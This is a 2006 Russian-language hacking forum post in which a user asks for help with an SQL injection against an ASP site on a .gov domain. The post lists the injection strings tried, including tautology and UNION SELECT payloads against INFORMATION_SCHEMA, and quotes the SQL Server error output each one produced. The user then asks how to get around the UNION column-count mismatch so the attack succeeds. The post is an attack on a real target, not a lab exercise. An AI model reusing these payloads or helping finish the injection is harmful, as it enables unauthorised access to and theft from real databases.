[ sql inj need help ]

13.08.2006, 20:46

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

С нами: 10459106

Репутация: 2996

Вот наткнулся на сайтик не как не могу понять что делаю не так sql точно есть но вот составить не как не могу вот краткий список моих действий.

_http://site.gov/index.asp?cat=6" or 1=1--
_http://site.gov/index.asp?cat=6' or 1=1--

Цитата:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' or 1=1--'.

/browsebycategory.asp, line 15

Исполняетьбся ез ошибок Принимает значение "6".
_http://site.gov/index.asp?cat=6 or 1=1--

Такой запрос не сьедает. Ругаеться на кол - во строк.
_http://site.gov/index.asp?cat=6 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

Цитата:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

/browsebycategory.asp, line 65

Попытка прервать запрос не удаеться.
как с одинарной так и с 2 кавычкой.
_http://site.gov/index.asp?cat=6'; UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

Цитата:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '; UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--'.

/browsebycategory.asp, line 15

Ну собственно хотелось бы узнать как составить запрос на выполнение кто может помогите.

Особенно интересует эта ошибка как ее обойти.
Понятно что количество строк не совпадает...

Цитата: